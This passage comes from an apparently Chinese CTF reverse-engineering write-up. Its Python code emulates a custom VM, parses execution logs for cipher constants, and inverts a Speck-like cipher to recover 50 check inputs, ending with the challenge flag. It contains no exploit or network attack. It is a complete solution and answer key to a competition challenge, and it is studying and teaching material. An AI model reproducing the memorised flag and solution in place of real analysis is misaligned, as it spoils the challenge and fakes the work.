(r7 & r6) & mask64 r0 = (r0 ^ r6) & mask64 if r7 == 0 : break r7 = (r7 << 1 ) & mask64 r6 = r7 return r0 def build_r2_schedule (): """ r2,r3,r4,r5 的更新和 r0,r1 无关,所以可以单独跑出每一轮的 r2_k。 返回长度为 27 的数组 R2[k] = 第 k 轮使用的 r2。 """ r2 = 0x6df9f721 r3 = 0x8d85b315 r4 = 0x40bc0884 r5 = 0x28e3d333 R2 = [] for k in range (27 ): R2.append(r2) if k == 0x1a : continue r0_g_in = r3 r1_g_in = r2 r2_g_in = k r0_H_A = func_A_32bit(r0_g_in) r0_H_B = func_B_32bit(r0_H_A, r1_g_in) r0_H_C = func_C_32bit(r0_H_B, r2_g_in) r1_H_D = func_D_32bit(r1_g_in) r1_H_E = func_E_32bit(r0_H_C, r1_H_D) r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C return R2 def rol32 (x, n ): return ((x << n) | (x >> (32 - n))) & mask32 def ror32 (x, n ): return ((x >> n) | (x << (32 - n))) & mask32 def inv_upper_round (r0_next, r1_next, r2_k ): """ 逆向一轮上半轮: 输入:本轮输出的 (r0_next, r1_next) 以及该轮使用的 r2_k 输出:本轮输入的 (r0_prev, r1_prev) """ c0 = r0_next & mask32 e1 = r1_next & mask32 d1 = (e1 ^ c0) & mask32 r1_prev = ror32(d1, 3 ) b0 = (c0 ^ r2_k) & mask32 a0 = (b0 - r1_prev) & mask32 r0_prev = rol32(a0, 8 ) return r0_prev, r1_prev def decrypt_from_trace (cipher ): final_r0 = cipher & mask32 final_r1 = (cipher >> 32 ) & mask32 R2 = build_r2_schedule() r0_curr, r1_curr = final_r0, final_r1 for k in reversed (range (27 )): r2_k = R2[k] r0_prev, r1_prev = inv_upper_round(r0_curr, r1_curr, r2_k) r0_curr, r1_curr = r0_prev, r1_prev r0_0, r1_0 = r0_curr, r1_curr v = ((r1_0 & mask32) << 32 ) | (r0_0 & mask32) x = (v ^ 0x99d88c4fa4cc68aa ) & mask64 x = (x - 0x58e8abfc7618f5fd ) & mask64 x = (x - 0xf8a82a8dbdb78c3f ) & mask64 x = (x - 0x11a8bb1017e16849 ) & mask64 x = (x - 0x7209f8c2f24400f7 ) & mask64 x ^= 0x311e18c91413b58c x ^= 0x4303f92241dd9a9f x ^= 0x95714c91bc8b306f x &= mask64 return x if __name__ == "__main__" : expected_output = 0x659391a5dc3522b3 recovered_input = decrypt_from_trace(expected_output) print (f"解出 input_val = 0x{recovered_input:016x} " )
check3的解密如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 mask64 = 0xFFFFFFFFFFFFFFFF mask32 = 0xFFFFFFFF def func_A_32bit (r_in ): r6 = (r_in >> 8 ) & mask32 r7 = (r_in << 24 ) & mask32 r6 = (r6 ^ r7) & mask32 return r6 def func_B_32bit (r0, r1 ): r6 = r1 while True : r7 = r0 r7 = (r7 & r6) & mask32 r0 = (r0 ^ r6) & mask32 if r7 == 0 : break r7 = (r7 << 1 ) & mask32 r6 = r7 r0 &= mask32 return r0 def func_C_32bit (r0, r2 ): return (r0 ^ r2) & mask32 def func_D_32bit (r_in ): r6 = (r_in << 3 ) & mask32 r7 = (r_in >> 29 ) & mask32 r6 = (r6 ^ r7) & mask32 return r6 def func_E_32bit (r0, r1 ): return (r1 ^ r0) & mask32 def loop_64bit (r0, r6 ): while True : r7 = r0 r7 = (r7 & r6) & mask64 r0 = (r0 ^ r6) & mask64 if r7 == 0 : break r7 = (r7 << 1 ) & mask64 r6 = r7 return r0 def build_r2_schedule (): """ 只跑 r2,r3,r4,r5 的“下半轮”,得到每一轮上半轮使用的 r2 常量。 """ r2 = 0x71be74bc r3 = 0x1d1a63b5 r4 = 0xaac04cfd r5 = 0x3e36eee3 R2 = [] for k in range (27 ): R2.append(r2) if k == 0x1a : continue r0_g_in = r3 r1_g_in = r2 r2_g_in = k r0_H_A = func_A_32bit(r0_g_in) r0_H_B = func_B_32bit(r0_H_A, r1_g_in) r0_H_C = func_C_32bit(r0_H_B, r2_g_in) r1_H_D = func_D_32bit(r1_g_in) r1_H_E = func_E_32bit(r0_H_C, r1_H_D) r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C return R2 def rol32 (x, n ): return ((x << n) | (x >> (32 - n))) & mask32 def ror32 (x, n ): return ((x >> n) | (x << (32 - n))) & mask32 def inv_upper_round (r0_next, r1_next, r2_k ): """ 逆向一轮上半轮: 给定输出 (r0_next,r1_next) 和 r2_k, 求上一轮输入 (r0_prev,r1_prev) """ c0 = r0_next & mask32 e1 = r1_next & mask32 d1 = (e1 ^ c0) & mask32 r1_prev = ror32(d1, 3 ) b0 = (c0 ^ r2_k) & mask32 a0 = (b0 - r1_prev) & mask32 r0_prev = rol32(a0, 8 ) return r0_prev, r1_prev def decrypt_from_cipher (cipher ): final_r0 = cipher & mask32 final_r1 = (cipher >> 32 ) & mask32 R2 = build_r2_schedule() r0_curr, r1_curr = final_r0, final_r1 for k in reversed (range (27 )): r2_k = R2[k] r0_prev, r1_prev = inv_upper_round(r0_curr, r1_curr, r2_k) r0_curr, r1_curr = r0_prev, r1_prev r0_0, r1_0 = r0_curr, r1_curr v = ((r1_0 & mask32) << 32 ) | (r0_0 & mask32) k1 = 0x52591d5fa111b92e k2 = 0x9eaac37a5d0b1747 k3 = 0xb98bdad21178175e k4 = 0x94c6e3f48118560b c1 = 0xc7e29a0a50ac78e3 c2 = 0xead13c41399fcfd6 c3 = 0x15f909ccb556ec05 c4 = 0xe885b64f981d1baa x = v & mask64 x = (x - k4) & mask64 x ^= c4 x = (x - k3) & mask64 x ^= c3 x = (x - k2) & mask64 x ^= c2 x ^= c1 x = (x - k1) & mask64 return x if __name__ == "__main__" : cipher = 0x5538224d4c7a252a pt = decrypt_from_cipher(cipher) print (f"解出的明文: 0x{pt:016x} " )
可以发现不止常量k、c、r不同,运算顺序也有所不同,具体表现在常量k,c的数量和speck加密(看到flag才了解到是这个)以及xor的顺序,其他部分是一致的
这就比较麻烦了,需要手动去盯帧下常量数据在日志里出现的逻辑以及运算顺序
在check了7、8轮左右基本找到规律,实现了一个简单的find功能,可以自动找到并排好k、c、r顺序,思路是定位关键指令,看代码和日志就知道我的逻辑了,不再赘述
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 with open ("check8.log" , "r" ) as f: lines = f.readlines() i = 0 result = [] nok = True while i < len (lines): if i < 10 and "RETVAL R7 = 0x00000000000000ff stored at dp=0xffef" in lines[i]: i += 1 k = int (lines[i].split("LDI R6 = " )[1 ].split("," )[0 ], 16 ) result.append([i, hex (k), "k" ]) if "XOR R0 ^= imm64" in lines[i]: c = int (lines[i].split("XOR R0 ^= imm64 " )[1 ].split(":" )[0 ], 16 ) result.append([i, hex (c), "c" ]) line = lines[i] if "CMP R7 == 0x0000000000000000? R7=0x0000000000000000, ZF=True" in line and nok: i += 1 while "AND R7 &= R6:" not in lines[i]: if "XOR R0 ^= imm64" in lines[i]: c = int (lines[i].split("XOR R0 ^= imm64 " )[1 ].split(":" )[0 ], 16 ) result.append([i, hex (c), "c" ]) if "LDI R1 = " in lines[i]: r = int (lines[i].split("LDI R1 = " )[1 ].split("," )[0 ], 16 ) rr1 = int .from_bytes(r.to_bytes(8 , byteorder="little" )[:4 ], byteorder="little" ) rr2 = int .from_bytes(r.to_bytes(8 , byteorder="little" )[4 :8 ], byteorder="little" ) result.append([i, hex (rr1), "r" ]) result.append([i, hex (rr2), "r" ]) i += 1 line = lines[i] k = int (line.split(" & " )[1 ].split(" " )[0 ], 16 ) if k == 0xfffffffffffffff0 : nok = False elif k != 1 : result.append([i, hex (k), "k" ]) i += 1 print (result)
这里列出了上面代码的结果
1 [[15 , '0xb70f19bde5399216' , 'k' ], [30 , '0x5074d85b9194e696' , 'c' ], [48 , '0xaa99b77363a30dcc' , 'k' ], [66 , '0x8cb331163a92fc19' , 'c' ], [67 , '0xe433713d' , 'r' ], [67 , '0x36b1cc9f' , 'r' ], [70 , '0x9c84ebd8' , 'r' ], [70 , '0xf97646d6' , 'r' ]]
手动很麻烦,50个数,所以尝试把VM、find、check解密三个代码合并在一起
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 import structMEM_SIZE = 0x10000 DATA_QWORD_BASE = 7168 DATA_BASE = DATA_QWORD_BASE * 8 def u8 (x ): return x & 0xFF def u16 (x ): return x & 0xFFFF def u32 (x ): return x & 0xFFFFFFFF def u64 (x ): return x & 0xFFFFFFFFFFFFFFFF class VM : def __init__ (self, vmcode: bytes , input_ints=None , debug_after_n=None ): self .mem = bytearray (MEM_SIZE) if len (vmcode) > DATA_BASE: raise ValueError("vmcode too large" ) self .mem[:len (vmcode)] = vmcode self .regs = [0 ] * 8 self .ip = 0 self .dp = 0xFFFF self .base0 = 0 self .base1 = 0 self .base2 = 0 self .zf = False self .run_flag = True self .output = None self .debug_ok = False self .num = 0 self .debug_after_n = debug_after_n if input_ints is not None : for idx, val in enumerate (input_ints): if idx >= 50 : break off = DATA_BASE + idx * 8 struct.pack_into("<Q" , self .mem, off, u64(val)) self .log_file = open ("vm.log" , "w" , encoding="utf-8" ) def read_u8 (self, addr ): addr &= 0xFFFF return self .mem[addr] def read_u16 (self, addr ): addr &= 0xFFFF if addr == 0xFFFF : return self .mem[addr] return self .mem[addr] | (self .mem[(addr + 1 ) & 0xFFFF ] << 8 ) def write_u8 (self, addr, val ): addr &= 0xFFFF self .mem[addr] = u8(val) def read_u64 (self, addr ): addr &= 0xFFFF bs = bytes (self .mem[addr:addr+8 ] + self .mem[:max (0 , addr+8 -MEM_SIZE)]) return struct.unpack_from("<Q" , bs, 0 )[0 ] def write_u64 (self, addr, val ): addr &= 0xFFFF b = struct.pack("<Q" , u64(val)) for i in range (8 ): self .mem[(addr + i) & 0xFFFF ] = b[i] def fetch_u8 (self ): b = self .read_u8(self .ip) self .ip = u16(self .ip + 1 ) return b def fetch_u16 (self ): lo = self .read_u8(self .ip) hi = self .read_u8(self .ip + 1 ) self .ip = u16(self .ip + 2 ) return (hi << 8 ) | lo def step (self, debug=False ): ip0 = self .ip opcode = self .fetch_u8() def log (msg ): cond = (debug or self .debug_ok) if self .debug_after_n is not None : cond = cond and (self .num == self .debug_after_n-1 ) if cond: line = f"[IP={ip0:04x} OP={opcode:02x} ] {msg} \n" if hasattr (self , "log_file" ) and self .log_file is not None : self .log_file.write(line) self .log_file.flush() else : print (line, end="" ) if opcode == 0x00 : log("NOP" ) return 1 elif opcode == 0x01 : imm = self .fetch_u16() self .ip = imm elif opcode == 0x02 : imm = self .fetch_u16() if not self .zf: self .ip = imm elif opcode == 0x03 : imm = self .fetch_u16() if self .zf: self .ip = imm elif opcode == 0x11 : imm = self .fetch_u16() self .base0 = imm elif opcode == 0x12 : imm = self .fetch_u16() self .base1 = imm elif opcode == 0x15 : reg = self .fetch_u8() if reg >= 8 : return 0 val = self .read_u64(self .base0) self .regs[reg] = val elif opcode == 0x16 : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) self .regs[reg] = imm self .zf = (imm == 0 ) log(f"LDI R{reg} = 0x{imm:016x} , ZF={self.zf} " ) elif opcode == 0x17 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 self .regs[dst] = self .regs[src] self .zf = (self .regs[dst] == 0 ) elif opcode == 0x18 : reg = self .fetch_u8() off = self .fetch_u16() if reg >= 8 : return 0 addr = u16(self .base0 + off) val = self .read_u64(addr) self .regs[reg] = val if reg == 0 : self .debug_ok = True log(f"LDQ R{reg} = [base0 + 0x{off:04x} ] @0x{addr:04x} => 0x{val:016x} " ) elif opcode == 0x19 : reg = self .fetch_u8() if reg >= 8 : return 0 self .write_u64(self .base0, self .regs[reg]) elif opcode == 0x1A : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base0 + idx) val = self .read_u8(addr) self .regs[dst] = val elif opcode == 0x1B : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base0 + idx) val = u8(self .regs[dst]) self .write_u8(addr, val) elif opcode == 0x1C : reg = self .fetch_u8() if reg >= 8 : return 0 old = self .regs[reg] self .regs[reg] = u64(old + 1 ) self .zf = (old == 0xFFFFFFFFFFFFFFFF ) elif opcode == 0x1D : reg = self .fetch_u8() if reg >= 8 : return 0 old = self .regs[reg] self .regs[reg] = u64(old - 1 ) self .zf = (old == 1 ) elif opcode == 0x1E : reg = self .fetch_u8() shift = self .fetch_u8() if reg >= 8 : return 0 val = self .regs[reg] res = u64(val >> (shift & 0x3F )) self .regs[reg] = res self .zf = (res == 0 ) elif opcode == 0x1F : reg = self .fetch_u8() if reg >= 8 : return 0 old = self .base0 self .base0 = u16(self .base0 + u16(self .regs[reg])) elif opcode == 0x25 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 old = self .regs[dst] self .regs[dst] = u64(old & self .regs[src]) self .zf = (self .regs[dst] == 0 ) log(f"AND R{dst} &= R{src} : 0x{old:016x} & 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x} , ZF={self.zf} " ) elif opcode == 0x26 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 old = self .regs[dst] self .regs[dst] = u64(old ^ self .regs[src]) self .zf = (self .regs[dst] == old) log(f"XOR R{dst} ^= R{src} : 0x{old:016x} ^ 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x} , ZF={self.zf} " ) elif opcode == 0x27 : reg = self .fetch_u8() shift = self .fetch_u8() if reg >= 8 : return 0 val = self .regs[reg] res = u64(val << (shift & 0x3F )) self .regs[reg] = res self .zf = (res == 0 ) elif opcode == 0x29 : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) old = self .regs[reg] self .regs[reg] = u64(old ^ imm) self .zf = (old == imm) log(f"XOR R{reg} ^= imm64 0x{imm:016x} : 0x{old:016x} -> 0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x2A : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) old = self .regs[reg] self .regs[reg] = u64(old & imm) self .zf = (self .regs[reg] == 0 ) elif opcode == 0x2B : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base1 + idx) val = self .read_u8(addr) self .regs[dst] = val elif opcode == 0x2C : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base1 + idx) val = u8(self .regs[dst]) self .write_u8(addr, val) elif opcode == 0x32 : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) self .zf = (self .regs[reg] == imm) log(f"CMP R{reg} == 0x{imm:016x} ? R{reg} =0x{self.regs[reg]:016x} , ZF={self.zf} " ) if reg == 0 : self .zf = True self .debug_ok = False self .num += 1 if self .num == self .debug_after_n: return 1 elif opcode == 0x80 : self .base2 = self .ip elif opcode == 0x81 : idx = self .fetch_u8() if not hasattr (self , "fun_table" ): self .fun_table = {} self .fun_table[idx] = u16(self .base2 + 3 ) elif opcode == 0x82 : idx = self .fetch_u8() if not hasattr (self , "fun_table" ) or idx not in self .fun_table: return 0 ret = self .ip self .dp = u16(self .dp - 2 ) self .write_u8(self .dp, ret & 0xFF ) self .write_u8(self .dp + 1 , (ret >> 8 ) & 0xFF ) self .ip = self .fun_table[idx] elif opcode == 0x83 : if self .dp == 0xFFFF : self .run_flag = False return 1 lo = self .read_u8(self .dp) hi = self .read_u8(self .dp + 1 ) ret = (hi << 8 ) | lo self .dp = u16(self .dp + 2 ) self .ip = ret elif opcode == 0x84 : reg = self .fetch_u8() if reg >= 8 : return 0 self .dp = u16(self .dp - 8 ) self .write_u64(self .dp, self .regs[reg]) self .output = self .regs[reg] log(f"RETVAL R{reg} = 0x{self.regs[reg]:016x} stored at dp=0x{self.dp:04x} , HALT" ) elif opcode == 0x85 : reg = self .fetch_u8() if reg >= 8 : return 0 val = self .read_u64(self .dp) self .regs[reg] = val self .dp = u16(self .dp + 8 ) elif opcode == 0x90 : arg = self .fetch_u8() log(f"SYSCALL 0x90 arg=0x{arg:02x} (NOT IMPLEMENTED) -> HALT" ) else : log(f"UNKNOWN opcode -> HALT" ) def run (self, debug=False ): steps = 0 try : while self .run_flag: a = self .step(debug=debug) if a == 0 : self .log_file.close() break steps += 1 return self .output finally : if hasattr (self , "log_file" ) and self .log_file is not None : self .log_file.close() self .log_file = None def run_vm_with_ints (ints, vmcode_path="full_vmcode" , debug=False , debug_after_n=9 ): with open (vmcode_path, "rb" ) as f: code = f.read() vm = VM(code, input_ints=ints, debug_after_n=debug_after_n) out = vm.run(debug=debug) return out, vm mask64 = 0xFFFFFFFFFFFFFFFF mask32 = 0xFFFFFFFF def loop_64bit (r0, r6 ): while True : r7 = r0 r7 = (r7 & r6) & mask64 r0 = (r0 ^ r6) & mask64 if r7 == 0 : break r7 = (r7 << 1 ) & mask64 r6 = r7 return r0 def func_A_32bit (r_in ): r6 = (r_in >> 8 ) & mask32 r7 = (r_in << 24 ) & mask32 r6 = (r6 ^ r7) & mask32 return r6 def func_B_32bit (r0, r1 ): r6 = r1 while True : r7 = r0 r7 = (r7 & r6) & mask32 r0 = (r0 ^ r6) & mask32 if r7 == 0 : break r7 = (r7 << 1 ) & mask32 r6 = r7 r0 &= mask32 return r0 def func_C_32bit (r0, r2 ): return (r0 ^ r2) & mask32 def func_D_32bit (r_in ): r6 = (r_in << 3 ) & mask32 r7 = (r_in >> 29 ) & mask32 r6 = (r6 ^ r7) & mask32 return r6 def func_E_32bit (r0, r1 ): return (r1 ^ r0) & mask32 def build_r2_schedule (r ): """ 只跑 r2,r3,r4,r5 的“下半轮”,得到每一轮上半轮使用的 r2 常量。 """ r2 = r[0 ] r3 = r[1 ] r4 = r[2 ] r5 = r[3 ] R2 = [] for k in range (27 ): R2.append(r2) if k == 0x1a : continue r0_g_in = r3 r1_g_in = r2 r2_g_in = k r0_H_A = func_A_32bit(r0_g_in) r0_H_B = func_B_32bit(r0_H_A, r1_g_in) r0_H_C = func_C_32bit(r0_H_B, r2_g_in) r1_H_D = func_D_32bit(r1_g_in) r1_H_E = func_E_32bit(r0_H_C, r1_H_D) r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C return R2 def rol32 (x, n ): return ((x << n) | (x >> (32 - n))) & mask32 def ror32 (x, n ): return ((x >> n) | (x << (32 - n))) & mask32 def inv_upper_round (r0_next, r1_next, r2_k ): """ 逆向一轮上半轮: 给定输出 (r0_next,r1_next) 和 r2_k, 求上一轮输入 (r0_prev,r1_prev) """ c0 = r0_next & mask32 e1 = r1_next & mask32 d1 = (e1 ^ c0) & mask32 r1_prev = ror32(d1, 3 ) b0 = (c0 ^ r2_k) & mask32 a0 = (b0 - r1_prev) & mask32 r0_prev = rol32(a0, 8 ) return r0_prev, r1_prev ints = [13430028123848624410 , 13767982679358783948 , 11713643540287541804 , 8785781270016547275 , 5592440162506734093 , 18308193844343275176 , 1734829927 , 12474808138286712448 , 14773488025708418042 , 6145507630794926191 , 1802201963 , 15600888960577064236 , 6903078875579093773 , 1852730990 , 13105847985596755079 , 12401591929655495169 , 14481374110727130427 , 3919366872831373201 , 11451939409513851430 , 1953789044 , 17235855896972825888 , 1987475062 , 1916851354365983645 , 2021161080 , 2038004089 , 2054847098 , 17641256427711907975 , 13917286480390178951 , 9086595392298378073 , 5295387722887053174 , 15356410353063384153 , 12187465423418120720 , 14608926774405230659 , 16160493834789769285 , 1229539657 , 13841060151611699047 , 1263225675 , 1280068684 , 10181670230088315432 , 1313754702 , 1330597711 , 5725376311369793868 , 12817717089813452135 , 11273537721551939182 , 3076809482903728308 , 1414812756 , 1431655765 , 6802938463641799296 , 11625777768394830813 , 1482184792 ] kkk = 35 while kkk <= 50 : result = [] out, vm = run_vm_with_ints(ints, vmcode_path="full_vmcode" , debug=False , debug_after_n=kkk) with open ("vm.log" , "r" , encoding="utf-8" ) as f: lines = f.readlines() input_value = 0 i = 0 nok = True while i < len (lines): if i < 10 and "RETVAL R7 = 0x00000000000000ff stored at dp=0xffef" in lines[i]: i += 1 k = int (lines[i].split("LDI R6 = " )[1 ].split("," )[0 ], 16 ) result.append([i, k, "k" ]) if "XOR R0 ^= imm64" in lines[i]: c = int (lines[i].split("XOR R0 ^= imm64 " )[1 ].split(":" )[0 ], 16 ) result.append([i, c, "c" ]) line = lines[i] if "CMP R7 == 0x0000000000000000? R7=0x0000000000000000, ZF=True" in line and nok: i += 1 while "AND R7 &= R6:" not in lines[i]: if "XOR R0 ^= imm64" in lines[i]: c = int (lines[i].split("XOR R0 ^= imm64 " )[1 ].split(":" )[0 ], 16 ) result.append([i, c, "c" ]) if "LDI R1 = " in lines[i]: r = int (lines[i].split("LDI R1 = " )[1 ].split("," )[0 ], 16 ) rr1 = int .from_bytes(r.to_bytes(8 , byteorder="little" )[:4 ], byteorder="little" ) rr2 = int .from_bytes(r.to_bytes(8 , byteorder="little" )[4 :8 ], byteorder="little" ) result.append([i, rr1, "r" ]) result.append([i, rr2, "r" ]) i += 1 line = lines[i] k = int (line.split(" & " )[1 ].split(" " )[0 ], 16 ) if k == 0xfffffffffffffff0 : nok = False elif k != 1 : result.append([i, k, "k" ]) if " => " in lines[i]: input_value = int (lines[i].split(" => " )[1 ], 16 ) print (hex (input_value)) if "CMP R0 == " in lines[i]: cipher = int (line.split("CMP R0 == " )[1 ].split("?" )[0 ], 16 ) print (hex (cipher)) print (result) final_r0 = cipher & mask32 final_r1 = (cipher >> 32 ) & mask32 r = [i[1 ] for i in result[-4 :]] R2 = build_r2_schedule(r) r0_curr, r1_curr = final_r0, final_r1 for k in reversed (range (27 )): r2_k = R2[k] r0_prev, r1_prev = inv_upper_round(r0_curr, r1_curr, r2_k) r0_curr, r1_curr = r0_prev, r1_prev r0_0, r1_0 = r0_curr, r1_curr v = ((r1_0 & mask32) << 32 ) | (r0_0 & mask32) x = v & mask64 for ck in result[:-4 ][::-1 ]: if ck[2 ] == 'k' : x = (x - ck[1 ]) & mask64 elif ck[2 ] == 'c' : x ^= ck[1 ] idx = ints.index(input_value) ints[idx] = x print (kkk, ints) kkk += 1 result = [] break i += 1
其中kkk是第几个check,具体逻辑是每次启动VM打印最后一轮(借助debug_after_n)check的日志(从数据读取开始到cmp),写入vm.log,vm里面在错误check的下一轮就会返回0导致vm退出,开始读取vm.log,使用find找到c、k、r等常量,同时提取出输入数值和cmp数值,找到cmp数值就开始做解密,由于代码都一样,只需根据c、k顺序修改x的计算即可,得到新的值替换掉ints里的输入数值,并打印新的ints
估计差不多30min能跑完,打印出最终的50个数,输入程序即可获取flag为RCTF{VM_ALU_SMC_RC4_SPECK!_593eb6079d2da6c187ed462b033fee34}